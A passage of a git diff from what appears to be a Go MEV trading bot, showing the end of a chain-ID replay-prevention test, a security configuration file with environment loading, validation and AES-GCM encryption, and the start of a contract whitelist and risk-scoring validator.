_, err = km.SignTransaction(requestWrong)
|
||||
assert.Error(t, err)
|
||||
assert.Contains(t, err.Error(), "doesn't match expected")
|
||||
|
||||
// Test chain validation stats
|
||||
stats := km.GetChainValidationStats()
|
||||
assert.NotNil(t, stats)
|
||||
assert.True(t, stats["total_validations"].(uint64) > 0)
|
||||
|
||||
// Test expected chain ID
|
||||
chainID := km.GetExpectedChainID()
|
||||
assert.Equal(t, expectedChainID.Uint64(), chainID.Uint64())
|
||||
}
|
||||
|
||||
func TestCrossChainReplayPrevention(t *testing.T) {
|
||||
logger := logger.New("info", "text", "")
|
||||
validator := NewChainIDValidator(logger, big.NewInt(42161))
|
||||
|
||||
// Add testnet to allowed chains for testing
|
||||
validator.AddAllowedChainID(421614)
|
||||
|
||||
privateKey, err := crypto.GenerateKey()
|
||||
require.NoError(t, err)
|
||||
signerAddr := crypto.PubkeyToAddress(privateKey.PublicKey)
|
||||
|
||||
// Create identical transaction data
|
||||
nonce := uint64(42)
|
||||
to := common.HexToAddress("0x1234567890123456789012345678901234567890")
|
||||
value := big.NewInt(1000000000000000000) // 1 ETH
|
||||
gasLimit := uint64(21000)
|
||||
gasPrice := big.NewInt(20000000000) // 20 Gwei
|
||||
|
||||
// Sign for mainnet
|
||||
tx1 := types.NewTransaction(nonce, to, value, gasLimit, gasPrice, nil)
|
||||
signer1 := types.NewEIP155Signer(big.NewInt(42161))
|
||||
signedTx1, err := types.SignTx(tx1, signer1, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
// Sign identical transaction for testnet
|
||||
tx2 := types.NewTransaction(nonce, to, value, gasLimit, gasPrice, nil)
|
||||
signer2 := types.NewEIP155Signer(big.NewInt(421614))
|
||||
signedTx2, err := types.SignTx(tx2, signer2, privateKey)
|
||||
require.NoError(t, err)
|
||||
|
||||
// First validation (mainnet) should pass
|
||||
result1 := validator.ValidateChainID(signedTx1, signerAddr, nil)
|
||||
assert.True(t, result1.Valid)
|
||||
assert.Equal(t, "NONE", result1.ReplayRisk)
|
||||
|
||||
// Second validation (testnet with same tx data) should detect replay risk
|
||||
result2 := validator.ValidateChainID(signedTx2, signerAddr, nil)
|
||||
assert.Equal(t, "CRITICAL", result2.ReplayRisk)
|
||||
assert.Contains(t, result2.Warnings[0], "replay attack")
|
||||
|
||||
// Verify the detector tracked both chain IDs
|
||||
stats := validator.GetValidationStats()
|
||||
assert.Equal(t, uint64(1), stats["replay_attempts"])
|
||||
}
|
||||
403
orig/pkg/security/config.go
Normal file
403
orig/pkg/security/config.go
Normal file
@@ -0,0 +1,403 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"crypto/aes"
|
||||
"crypto/cipher"
|
||||
"crypto/rand"
|
||||
"crypto/sha256"
|
||||
"encoding/base64"
|
||||
"fmt"
|
||||
"io"
|
||||
"os"
|
||||
"regexp"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
)
|
||||
|
||||
// SecureConfig manages all security-sensitive configuration
|
||||
type SecureConfig struct {
|
||||
// Network endpoints - never hardcoded
|
||||
RPCEndpoints []string
|
||||
WSEndpoints []string
|
||||
BackupRPCs []string
|
||||
|
||||
// Security settings
|
||||
MaxGasPriceGwei int64
|
||||
MaxTransactionValue string // In ETH
|
||||
MaxSlippageBps uint64
|
||||
MinProfitThreshold string // In ETH
|
||||
|
||||
// Rate limiting
|
||||
MaxRequestsPerSecond int
|
||||
BurstSize int
|
||||
|
||||
// Timeouts
|
||||
RPCTimeout time.Duration
|
||||
WebSocketTimeout time.Duration
|
||||
TransactionTimeout time.Duration
|
||||
|
||||
// Encryption
|
||||
encryptionKey []byte
|
||||
}
|
||||
|
||||
// SecurityLimits defines operational security limits
|
||||
type SecurityLimits struct {
|
||||
MaxGasPrice int64 // Gwei
|
||||
MaxTransactionValue string // ETH
|
||||
MaxDailyVolume string // ETH
|
||||
MaxSlippage uint64 // basis points
|
||||
MinProfit string // ETH
|
||||
MaxOrderSize string // ETH
|
||||
}
|
||||
|
||||
// EndpointConfig stores RPC endpoint configuration securely
|
||||
type EndpointConfig struct {
|
||||
URL string
|
||||
Priority int
|
||||
Timeout time.Duration
|
||||
MaxConnections int
|
||||
HealthCheckURL string
|
||||
RequiresAuth bool
|
||||
AuthToken string // Encrypted when stored
|
||||
}
|
||||
|
||||
// NewSecureConfig creates a new secure configuration from environment
|
||||
func NewSecureConfig() (*SecureConfig, error) {
|
||||
config := &SecureConfig{}
|
||||
|
||||
// Load encryption key from environment
|
||||
keyStr := os.Getenv("MEV_BOT_ENCRYPTION_KEY")
|
||||
if keyStr == "" {
|
||||
return nil, fmt.Errorf("MEV_BOT_ENCRYPTION_KEY environment variable is required")
|
||||
}
|
||||
|
||||
key, err := base64.StdEncoding.DecodeString(keyStr)
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("invalid encryption key format: %w", err)
|
||||
}
|
||||
|
||||
if len(key) != 32 {
|
||||
return nil, fmt.Errorf("encryption key must be 32 bytes (256 bits)")
|
||||
}
|
||||
|
||||
config.encryptionKey = key
|
||||
|
||||
// Load RPC endpoints
|
||||
if err := config.loadRPCEndpoints(); err != nil {
|
||||
return nil, fmt.Errorf("failed to load RPC endpoints: %w", err)
|
||||
}
|
||||
|
||||
// Load security limits
|
||||
if err := config.loadSecurityLimits(); err != nil {
|
||||
return nil, fmt.Errorf("failed to load security limits: %w", err)
|
||||
}
|
||||
|
||||
// Load rate limiting config
|
||||
if err := config.loadRateLimits(); err != nil {
|
||||
return nil, fmt.Errorf("failed to load rate limits: %w", err)
|
||||
}
|
||||
|
||||
// Load timeouts
|
||||
if err := config.loadTimeouts(); err != nil {
|
||||
return nil, fmt.Errorf("failed to load timeouts: %w", err)
|
||||
}
|
||||
|
||||
return config, nil
|
||||
}
|
||||
|
||||
// loadRPCEndpoints loads and validates RPC endpoints from environment
|
||||
func (sc *SecureConfig) loadRPCEndpoints() error {
|
||||
// Primary RPC endpoints
|
||||
rpcEndpoints := os.Getenv("ARBITRUM_RPC_ENDPOINTS")
|
||||
if rpcEndpoints == "" {
|
||||
return fmt.Errorf("ARBITRUM_RPC_ENDPOINTS environment variable is required")
|
||||
}
|
||||
|
||||
sc.RPCEndpoints = strings.Split(rpcEndpoints, ",")
|
||||
for i, endpoint := range sc.RPCEndpoints {
|
||||
sc.RPCEndpoints[i] = strings.TrimSpace(endpoint)
|
||||
if err := validateEndpoint(sc.RPCEndpoints[i]); err != nil {
|
||||
return fmt.Errorf("invalid RPC endpoint %s: %w", sc.RPCEndpoints[i], err)
|
||||
}
|
||||
}
|
||||
|
||||
// WebSocket endpoints
|
||||
wsEndpoints := os.Getenv("ARBITRUM_WS_ENDPOINTS")
|
||||
if wsEndpoints != "" {
|
||||
sc.WSEndpoints = strings.Split(wsEndpoints, ",")
|
||||
for i, endpoint := range sc.WSEndpoints {
|
||||
sc.WSEndpoints[i] = strings.TrimSpace(endpoint)
|
||||
if err := validateWebSocketEndpoint(sc.WSEndpoints[i]); err != nil {
|
||||
return fmt.Errorf("invalid WebSocket endpoint %s: %w", sc.WSEndpoints[i], err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Backup RPC endpoints
|
||||
backupRPCs := os.Getenv("BACKUP_RPC_ENDPOINTS")
|
||||
if backupRPCs != "" {
|
||||
sc.BackupRPCs = strings.Split(backupRPCs, ",")
|
||||
for i, endpoint := range sc.BackupRPCs {
|
||||
sc.BackupRPCs[i] = strings.TrimSpace(endpoint)
|
||||
if err := validateEndpoint(sc.BackupRPCs[i]); err != nil {
|
||||
return fmt.Errorf("invalid backup RPC endpoint %s: %w", sc.BackupRPCs[i], err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// loadSecurityLimits loads security limits from environment with safe defaults
|
||||
func (sc *SecureConfig) loadSecurityLimits() error {
|
||||
// Max gas price in Gwei (default: 1000 Gwei)
|
||||
maxGasPriceStr := getEnvWithDefault("MAX_GAS_PRICE_GWEI", "1000")
|
||||
maxGasPrice, err := strconv.ParseInt(maxGasPriceStr, 10, 64)
|
||||
if err != nil || maxGasPrice <= 0 || maxGasPrice > 100000 {
|
||||
return fmt.Errorf("invalid MAX_GAS_PRICE_GWEI: must be between 1 and 100000")
|
||||
}
|
||||
sc.MaxGasPriceGwei = maxGasPrice
|
||||
|
||||
// Max transaction value in ETH (default: 100 ETH)
|
||||
sc.MaxTransactionValue = getEnvWithDefault("MAX_TRANSACTION_VALUE_ETH", "100")
|
||||
if err := validateETHAmount(sc.MaxTransactionValue); err != nil {
|
||||
return fmt.Errorf("invalid MAX_TRANSACTION_VALUE_ETH: %w", err)
|
||||
}
|
||||
|
||||
// Max slippage in basis points (default: 500 = 5%)
|
||||
maxSlippageStr := getEnvWithDefault("MAX_SLIPPAGE_BPS", "500")
|
||||
maxSlippage, err := strconv.ParseUint(maxSlippageStr, 10, 64)
|
||||
if err != nil || maxSlippage > 10000 {
|
||||
return fmt.Errorf("invalid MAX_SLIPPAGE_BPS: must be between 0 and 10000")
|
||||
}
|
||||
sc.MaxSlippageBps = maxSlippage
|
||||
|
||||
// Min profit threshold in ETH (default: 0.01 ETH)
|
||||
sc.MinProfitThreshold = getEnvWithDefault("MIN_PROFIT_THRESHOLD_ETH", "0.01")
|
||||
if err := validateETHAmount(sc.MinProfitThreshold); err != nil {
|
||||
return fmt.Errorf("invalid MIN_PROFIT_THRESHOLD_ETH: %w", err)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// loadRateLimits loads rate limiting configuration
|
||||
func (sc *SecureConfig) loadRateLimits() error {
|
||||
// Max requests per second (default: 100)
|
||||
maxRPSStr := getEnvWithDefault("MAX_REQUESTS_PER_SECOND", "100")
|
||||
maxRPS, err := strconv.Atoi(maxRPSStr)
|
||||
if err != nil || maxRPS <= 0 || maxRPS > 10000 {
|
||||
return fmt.Errorf("invalid MAX_REQUESTS_PER_SECOND: must be between 1 and 10000")
|
||||
}
|
||||
sc.MaxRequestsPerSecond = maxRPS
|
||||
|
||||
// Burst size (default: 200)
|
||||
burstSizeStr := getEnvWithDefault("RATE_LIMIT_BURST_SIZE", "200")
|
||||
burstSize, err := strconv.Atoi(burstSizeStr)
|
||||
if err != nil || burstSize <= 0 || burstSize > 20000 {
|
||||
return fmt.Errorf("invalid RATE_LIMIT_BURST_SIZE: must be between 1 and 20000")
|
||||
}
|
||||
sc.BurstSize = burstSize
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// loadTimeouts loads timeout configuration
|
||||
func (sc *SecureConfig) loadTimeouts() error {
|
||||
// RPC timeout (default: 30s)
|
||||
rpcTimeoutStr := getEnvWithDefault("RPC_TIMEOUT_SECONDS", "30")
|
||||
rpcTimeout, err := strconv.Atoi(rpcTimeoutStr)
|
||||
if err != nil || rpcTimeout <= 0 || rpcTimeout > 300 {
|
||||
return fmt.Errorf("invalid RPC_TIMEOUT_SECONDS: must be between 1 and 300")
|
||||
}
|
||||
sc.RPCTimeout = time.Duration(rpcTimeout) * time.Second
|
||||
|
||||
// WebSocket timeout (default: 60s)
|
||||
wsTimeoutStr := getEnvWithDefault("WEBSOCKET_TIMEOUT_SECONDS", "60")
|
||||
wsTimeout, err := strconv.Atoi(wsTimeoutStr)
|
||||
if err != nil || wsTimeout <= 0 || wsTimeout > 600 {
|
||||
return fmt.Errorf("invalid WEBSOCKET_TIMEOUT_SECONDS: must be between 1 and 600")
|
||||
}
|
||||
sc.WebSocketTimeout = time.Duration(wsTimeout) * time.Second
|
||||
|
||||
// Transaction timeout (default: 300s)
|
||||
txTimeoutStr := getEnvWithDefault("TRANSACTION_TIMEOUT_SECONDS", "300")
|
||||
txTimeout, err := strconv.Atoi(txTimeoutStr)
|
||||
if err != nil || txTimeout <= 0 || txTimeout > 3600 {
|
||||
return fmt.Errorf("invalid TRANSACTION_TIMEOUT_SECONDS: must be between 1 and 3600")
|
||||
}
|
||||
sc.TransactionTimeout = time.Duration(txTimeout) * time.Second
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// GetPrimaryRPCEndpoint returns the first healthy RPC endpoint
|
||||
func (sc *SecureConfig) GetPrimaryRPCEndpoint() string {
|
||||
if len(sc.RPCEndpoints) == 0 {
|
||||
return ""
|
||||
}
|
||||
return sc.RPCEndpoints[0]
|
||||
}
|
||||
|
||||
// GetAllRPCEndpoints returns all configured RPC endpoints
|
||||
func (sc *SecureConfig) GetAllRPCEndpoints() []string {
|
||||
return append(sc.RPCEndpoints, sc.BackupRPCs...)
|
||||
}
|
||||
|
||||
// Encrypt encrypts sensitive data using AES-256-GCM
|
||||
func (sc *SecureConfig) Encrypt(plaintext string) (string, error) {
|
||||
if sc.encryptionKey == nil {
|
||||
return "", fmt.Errorf("encryption key not initialized")
|
||||
}
|
||||
|
||||
block, err := aes.NewCipher(sc.encryptionKey)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("failed to create cipher: %w", err)
|
||||
}
|
||||
|
||||
gcm, err := cipher.NewGCM(block)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("failed to create GCM: %w", err)
|
||||
}
|
||||
|
||||
nonce := make([]byte, gcm.NonceSize())
|
||||
if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
|
||||
return "", fmt.Errorf("failed to generate nonce: %w", err)
|
||||
}
|
||||
|
||||
ciphertext := gcm.Seal(nonce, nonce, []byte(plaintext), nil)
|
||||
return base64.StdEncoding.EncodeToString(ciphertext), nil
|
||||
}
|
||||
|
||||
// Decrypt decrypts data encrypted with Encrypt
|
||||
func (sc *SecureConfig) Decrypt(ciphertext string) (string, error) {
|
||||
if sc.encryptionKey == nil {
|
||||
return "", fmt.Errorf("encryption key not initialized")
|
||||
}
|
||||
|
||||
data, err := base64.StdEncoding.DecodeString(ciphertext)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("failed to decode ciphertext: %w", err)
|
||||
}
|
||||
|
||||
block, err := aes.NewCipher(sc.encryptionKey)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("failed to create cipher: %w", err)
|
||||
}
|
||||
|
||||
gcm, err := cipher.NewGCM(block)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("failed to create GCM: %w", err)
|
||||
}
|
||||
|
||||
nonceSize := gcm.NonceSize()
|
||||
if len(data) < nonceSize {
|
||||
return "", fmt.Errorf("ciphertext too short")
|
||||
}
|
||||
|
||||
nonce, ciphertextBytes := data[:nonceSize], data[nonceSize:]
|
||||
plaintext, err := gcm.Open(nil, nonce, ciphertextBytes, nil)
|
||||
if err != nil {
|
||||
return "", fmt.Errorf("failed to decrypt: %w", err)
|
||||
}
|
||||
|
||||
return string(plaintext), nil
|
||||
}
|
||||
|
||||
// GenerateEncryptionKey generates a new 256-bit encryption key
|
||||
func GenerateEncryptionKey() (string, error) {
|
||||
key := make([]byte, 32) // 256 bits
|
||||
if _, err := rand.Read(key); err != nil {
|
||||
return "", fmt.Errorf("failed to generate encryption key: %w", err)
|
||||
}
|
||||
return base64.StdEncoding.EncodeToString(key), nil
|
||||
}
|
||||
|
||||
// validateEndpoint validates RPC endpoint URL format
|
||||
func validateEndpoint(endpoint string) error {
|
||||
if endpoint == "" {
|
||||
return fmt.Errorf("endpoint cannot be empty")
|
||||
}
|
||||
|
||||
// Check for required protocols
|
||||
if !strings.HasPrefix(endpoint, "https://") && !strings.HasPrefix(endpoint, "wss://") {
|
||||
return fmt.Errorf("endpoint must use HTTPS or WSS protocol")
|
||||
}
|
||||
|
||||
// Check for suspicious patterns that might indicate hardcoded keys
|
||||
suspiciousPatterns := []string{
|
||||
"localhost",
|
||||
"127.0.0.1",
|
||||
"demo",
|
||||
"test",
|
||||
"example",
|
||||
}
|
||||
|
||||
lowerEndpoint := strings.ToLower(endpoint)
|
||||
for _, pattern := range suspiciousPatterns {
|
||||
if strings.Contains(lowerEndpoint, pattern) {
|
||||
return fmt.Errorf("endpoint contains suspicious pattern: %s", pattern)
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// validateWebSocketEndpoint validates WebSocket endpoint
|
||||
func validateWebSocketEndpoint(endpoint string) error {
|
||||
if !strings.HasPrefix(endpoint, "wss://") {
|
||||
return fmt.Errorf("WebSocket endpoint must use WSS protocol")
|
||||
}
|
||||
return validateEndpoint(endpoint)
|
||||
}
|
||||
|
||||
// validateETHAmount validates ETH amount string
|
||||
func validateETHAmount(amount string) error {
|
||||
// Use regex to validate ETH amount format
|
||||
ethPattern := `^(\d+\.?\d*|\.\d+)$`
|
||||
matched, err := regexp.MatchString(ethPattern, amount)
|
||||
if err != nil {
|
||||
return fmt.Errorf("regex error: %w", err)
|
||||
}
|
||||
if !matched {
|
||||
return fmt.Errorf("invalid ETH amount format")
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// getEnvWithDefault gets environment variable with fallback default
|
||||
func getEnvWithDefault(key, defaultValue string) string {
|
||||
if value := os.Getenv(key); value != "" {
|
||||
return value
|
||||
}
|
||||
return defaultValue
|
||||
}
|
||||
|
||||
// CreateConfigHash creates a SHA256 hash of configuration for integrity checking
|
||||
func (sc *SecureConfig) CreateConfigHash() string {
|
||||
hasher := sha256.New()
|
||||
hasher.Write([]byte(fmt.Sprintf("%v", sc.RPCEndpoints)))
|
||||
hasher.Write([]byte(fmt.Sprintf("%d", sc.MaxGasPriceGwei)))
|
||||
hasher.Write([]byte(sc.MaxTransactionValue))
|
||||
hasher.Write([]byte(fmt.Sprintf("%d", sc.MaxSlippageBps)))
|
||||
return fmt.Sprintf("%x", hasher.Sum(nil))
|
||||
}
|
||||
|
||||
// SecurityProfile returns current security configuration summary
|
||||
func (sc *SecureConfig) SecurityProfile() map[string]interface{} {
|
||||
return map[string]interface{}{
|
||||
"max_gas_price_gwei": sc.MaxGasPriceGwei,
|
||||
"max_transaction_value": sc.MaxTransactionValue,
|
||||
"max_slippage_bps": sc.MaxSlippageBps,
|
||||
"min_profit_threshold": sc.MinProfitThreshold,
|
||||
"max_requests_per_second": sc.MaxRequestsPerSecond,
|
||||
"rpc_timeout": sc.RPCTimeout.String(),
|
||||
"websocket_timeout": sc.WebSocketTimeout.String(),
|
||||
"transaction_timeout": sc.TransactionTimeout.String(),
|
||||
"rpc_endpoints_count": len(sc.RPCEndpoints),
|
||||
"backup_rpcs_count": len(sc.BackupRPCs),
|
||||
"config_hash": sc.CreateConfigHash(),
|
||||
}
|
||||
}
|
||||
564
orig/pkg/security/contract_validator.go
Normal file
564
orig/pkg/security/contract_validator.go
Normal file
@@ -0,0 +1,564 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/hex"
|
||||
"fmt"
|
||||
"math/big"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/ethereum/go-ethereum/common"
|
||||
"github.com/ethereum/go-ethereum/core/types"
|
||||
"github.com/ethereum/go-ethereum/crypto"
|
||||
"github.com/ethereum/go-ethereum/ethclient"
|
||||
|
||||
"github.com/fraktal/mev-beta/internal/logger"
|
||||
)
|
||||
|
||||
// ContractInfo represents information about a verified contract
|
||||
type ContractInfo struct {
|
||||
Address common.Address `json:"address"`
|
||||
BytecodeHash string `json:"bytecode_hash"`
|
||||
Name string `json:"name"`
|
||||
Version string `json:"version"`
|
||||
DeployedAt *big.Int `json:"deployed_at"`
|
||||
Deployer common.Address `json:"deployer"`
|
||||
VerifiedAt time.Time `json:"verified_at"`
|
||||
IsWhitelisted bool `json:"is_whitelisted"`
|
||||
RiskLevel RiskLevel `json:"risk_level"`
|
||||
Permissions ContractPermissions `json:"permissions"`
|
||||
ABIHash string `json:"abi_hash,omitempty"`
|
||||
SourceCodeHash string `json:"source_code_hash,omitempty"`
|
||||
}
|
||||
|
||||
// ContractPermissions defines what operations are allowed with a contract
|
||||
type ContractPermissions struct {
|
||||
CanInteract bool `json:"can_interact"`
|
||||
CanSendValue bool `json:"can_send_value"`
|
||||
MaxValueWei *big.Int `json:"max_value_wei,omitempty"`
|
||||
AllowedMethods []string `json:"allowed_methods,omitempty"`
|
||||
RequireConfirm bool `json:"require_confirmation"`
|
||||
DailyLimit *big.Int `json:"daily_limit,omitempty"`
|
||||
}
|
||||
|
||||
// RiskLevel represents the risk assessment of a contract
|
||||
type RiskLevel int
|
||||
|
||||
const (
|
||||
RiskLevelLow RiskLevel = iota
|
||||
RiskLevelMedium
|
||||
RiskLevelHigh
|
||||
RiskLevelCritical
|
||||
RiskLevelBlocked
|
||||
)
|
||||
|
||||
func (r RiskLevel) String() string {
|
||||
switch r {
|
||||
case RiskLevelLow:
|
||||
return "Low"
|
||||
case RiskLevelMedium:
|
||||
return "Medium"
|
||||
case RiskLevelHigh:
|
||||
return "High"
|
||||
case RiskLevelCritical:
|
||||
return "Critical"
|
||||
case RiskLevelBlocked:
|
||||
return "Blocked"
|
||||
default:
|
||||
return "Unknown"
|
||||
}
|
||||
}
|
||||
|
||||
// ContractValidationResult contains the result of contract validation
|
||||
type ContractValidationResult struct {
|
||||
IsValid bool `json:"is_valid"`
|
||||
ContractInfo *ContractInfo `json:"contract_info"`
|
||||
ValidationError string `json:"validation_error,omitempty"`
|
||||
Warnings []string `json:"warnings"`
|
||||
ChecksPerformed []ValidationCheck `json:"checks_performed"`
|
||||
RiskScore int `json:"risk_score"` // 1-10
|
||||
}
|
||||
|
||||
// ValidationCheck represents a single validation check
|
||||
type ValidationCheck struct {
|
||||
Name string `json:"name"`
|
||||
Passed bool `json:"passed"`
|
||||
Description string `json:"description"`
|
||||
Error string `json:"error,omitempty"`
|
||||
Timestamp time.Time `json:"timestamp"`
|
||||
}
|
||||
|
||||
// ContractValidator provides secure contract validation and verification
|
||||
type ContractValidator struct {
|
||||
client *ethclient.Client
|
||||
logger *logger.Logger
|
||||
trustedContracts map[common.Address]*ContractInfo
|
||||
contractCache map[common.Address]*ContractInfo
|
||||
cacheMutex sync.RWMutex
|
||||
config *ContractValidatorConfig
|
||||
|
||||
// Security tracking
|
||||
interactionCounts map[common.Address]int64
|
||||
dailyLimits map[common.Address]*big.Int
|
||||
lastResetTime time.Time
|
||||
limitsMutex sync.RWMutex
|
||||
}
|
||||
|
||||
// ContractValidatorConfig provides configuration for the contract validator
|
||||
type ContractValidatorConfig struct {
|
||||
EnableBytecodeVerification bool `json:"enable_bytecode_verification"`
|
||||
EnableABIValidation bool `json:"enable_abi_validation"`
|
||||
RequireWhitelist bool `json:"require_whitelist"`
|
||||
MaxBytecodeSize int `json:"max_bytecode_size"`
|
||||
CacheTimeout time.Duration `json:"cache_timeout"`
|
||||
MaxRiskScore int `json:"max_risk_score"`
|
||||
BlockUnverifiedContracts bool `json:"block_unverified_contracts"`
|
||||
RequireSourceCode bool `json:"require_source_code"`
|
||||
EnableRealTimeValidation bool `json:"enable_realtime_validation"`
|
||||
}
|
||||
|
||||
// NewContractValidator creates a new contract validator
|
||||
func NewContractValidator(client *ethclient.Client, logger *logger.Logger, config *ContractValidatorConfig) *ContractValidator {
|
||||
if config == nil {
|
||||
config = getDefaultValidatorConfig()
|
||||
}
|
||||
|
||||
return &ContractValidator{
|
||||
client: client,
|
||||
logger: logger,
|
||||
config: config,
|
||||
trustedContracts: make(map[common.Address]*ContractInfo),
|
||||
contractCache: make(map[common.Address]*ContractInfo),
|
||||
interactionCounts: make(map[common.Address]int64),
|
||||
dailyLimits: make(map[common.Address]*big.Int),
|
||||
lastResetTime: time.Now(),
|
||||
}
|
||||
}
|
||||
|
||||
// AddTrustedContract adds a contract to the trusted list
|
||||
func (cv *ContractValidator) AddTrustedContract(info *ContractInfo) error {
|
||||
cv.cacheMutex.Lock()
|
||||
defer cv.cacheMutex.Unlock()
|
||||
|
||||
// Validate the contract info
|
||||
if info.Address == (common.Address{}) {
|
||||
return fmt.Errorf("invalid contract address")
|
||||
}
|
||||
|
||||
if info.BytecodeHash == "" {
|
||||
return fmt.Errorf("bytecode hash is required")
|
||||
}
|
||||
|
||||
// Mark as whitelisted and set low risk
|
||||
info.IsWhitelisted = true
|
||||
if info.RiskLevel == 0 {
|
||||
info.RiskLevel = RiskLevelLow
|
||||
}
|
||||
info.VerifiedAt = time.Now()
|
||||
|
||||
cv.trustedContracts[info.Address] = info
|
||||
cv.contractCache[info.Address] = info
|
||||
|
||||
cv.logger.Info(fmt.Sprintf("Added trusted contract: %s (%s)", info.Address.Hex(), info.Name))
|
||||
return nil
|
||||
}
|
||||
|
||||
// ValidateContract performs comprehensive contract validation
|
||||
func (cv *ContractValidator) ValidateContract(ctx context.Context, address common.Address) (*ContractValidationResult, error) {
|
||||
result := &ContractValidationResult{
|
||||
IsValid: false,
|
||||
Warnings: make([]string, 0),
|
||||
ChecksPerformed: make([]ValidationCheck, 0),
|
||||
}
|
||||
|
||||
// Check if contract is in trusted list first
|
||||
cv.cacheMutex.RLock()
|
||||
if trusted, exists := cv.trustedContracts[address]; exists {
|
||||
cv.cacheMutex.RUnlock()
|
||||
result.IsValid = true
|
||||
result.ContractInfo = trusted
|
||||
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
|
||||
Name: "Trusted Contract Check",
|
||||
Passed: true,
|
||||
Description: "Contract found in trusted whitelist",
|
||||
Timestamp: time.Now(),
|
||||
})
|
||||
return result, nil
|
||||
}
|
||||
|
||||
// Check cache
|
||||
if cached, exists := cv.contractCache[address]; exists {
|
||||
if time.Since(cached.VerifiedAt) < cv.config.CacheTimeout {
|
||||
cv.cacheMutex.RUnlock()
|
||||
result.IsValid = true
|
||||
result.ContractInfo = cached
|
||||
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
|
||||
Name: "Cache Check",
|
||||
Passed: true,
|
||||
Description: "Contract found in validation cache",
|
||||
Timestamp: time.Now(),
|
||||
})
|
||||
return result, nil
|
||||
}
|
||||
}
|
||||
cv.cacheMutex.RUnlock()
|
||||
|
||||
// Perform real-time validation
|
||||
contractInfo, err := cv.validateContractOnChain(ctx, address, result)
|
||||
if err != nil {
|
||||
result.ValidationError = err.Error()
|
||||
return result, err
|
||||
}
|
||||
|
||||
result.ContractInfo = contractInfo
|
||||
result.RiskScore = cv.calculateRiskScore(contractInfo, result)
|
||||
|
||||
// Check if contract meets security requirements
|
||||
if cv.config.RequireWhitelist && !contractInfo.IsWhitelisted {
|
||||
result.ValidationError = "Contract not whitelisted"
|
||||
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
|
||||
Name: "Whitelist Check",
|
||||
Passed: false,
|
||||
Description: "Contract not found in whitelist",
|
||||
Error: "Contract not whitelisted",
|
||||
Timestamp: time.Now(),
|
||||
})
|
||||
return result, fmt.Errorf("contract not whitelisted: %s", address.Hex())
|
||||
}
|
||||
|
||||
if result.RiskScore > cv.config.MaxRiskScore {
|
||||
result.ValidationError = fmt.Sprintf("Risk score too high: %d > %d", result.RiskScore, cv.config.MaxRiskScore)
|
||||
return result, fmt.Errorf("contract risk score too high: %d", result.RiskScore)
|
||||
}
|
||||
|
||||
// Cache the validation result
|
||||
cv.cacheMutex.Lock()
|
||||
cv.contractCache[address] = contractInfo
|
||||
cv.cacheMutex.Unlock()
|
||||
|
||||
result.IsValid = true
|
||||
return result, nil
|
||||
}
|
||||
|
||||
// validateContractOnChain performs on-chain validation of a contract
|
||||
func (cv *ContractValidator) validateContractOnChain(ctx context.Context, address common.Address, result *ContractValidationResult) (*ContractInfo, error) {
|
||||
// Check if address is a contract
|
||||
bytecode, err := cv.client.CodeAt(ctx, address, nil)
|
||||
if err != nil {
|
||||
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
|
||||
Name: "Bytecode Retrieval",
|
||||
Passed: false,
|
||||
Description: "Failed to retrieve contract bytecode",
|
||||
Error: err.Error(),
|
||||
Timestamp: time.Now(),
|
||||
})
|
||||
return nil, fmt.Errorf("failed to get contract bytecode: %w", err)
|
||||
}
|
||||
|
||||
if len(bytecode) == 0 {
|
||||
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
|
||||
Name: "Contract Existence",
|
||||
Passed: false,
|
||||
Description: "Address is not a contract (no bytecode)",
|
||||
Error: "No bytecode found",
|
||||
Timestamp: time.Now(),
|
||||
})
|
||||
return nil, fmt.Errorf("address is not a contract: %s", address.Hex())
|
||||
}
|
||||
|
||||
result.ChecksPerformed = append(result.ChecksPerformed, ValidationCheck{
|
||||
Name: "Contract Existence",
|
||||
Passed: true,
|
||||
Description: fmt.Sprintf("Contract bytecode found (%d bytes)", len(bytecode)),
|
||||
Timestamp: time.Now(),
|
||||
})
|
||||
|
||||
// Validate bytecode size
|
||||
if cv.config.MaxBytecodeSize > 0 && len(bytecode) > cv.config.MaxBytecodeSize {
|
||||
result.Warnings = append(result.Warnings, fmt.Sprintf("Large bytecode size: %d bytes", len(bytecode)))
|
||||
}
|
||||
|
||||
// Create bytecode hash
|
||||
bytecodeHash := crypto.Keccak256Hash(bytecode).Hex()
|
||||
|
||||
// Get deployment transaction info
|
||||
deployedAt, deployer, err := cv.getDeploymentInfo(ctx, address)
|
||||
if err != nil {
|
||||
cv.logger.Warn(fmt.Sprintf("Could not retrieve deployment info for %s: %v", address.Hex(), err))
|
||||
deployedAt = big.NewInt(0)
|
||||
deployer = common.Address{}
|
||||
}
|
||||
|
||||
// Create contract info
|
||||
contractInfo := &ContractInfo{
|
||||
Address: address,
|
||||
BytecodeHash: bytecodeHash,
|
||||
Name: "Unknown Contract",
|
||||
Version: "unknown",
|
||||
DeployedAt: deployedAt,
|
||||
Deployer: deployer,
|
||||
VerifiedAt: time.Now(),
|
||||
IsWhitelisted: false,
|
||||
RiskLevel: cv.assessRiskLevel(bytecode, result),
|
||||
Permissions: cv.getDefaultPermissions(),
|
||||
}
|
||||
|
||||
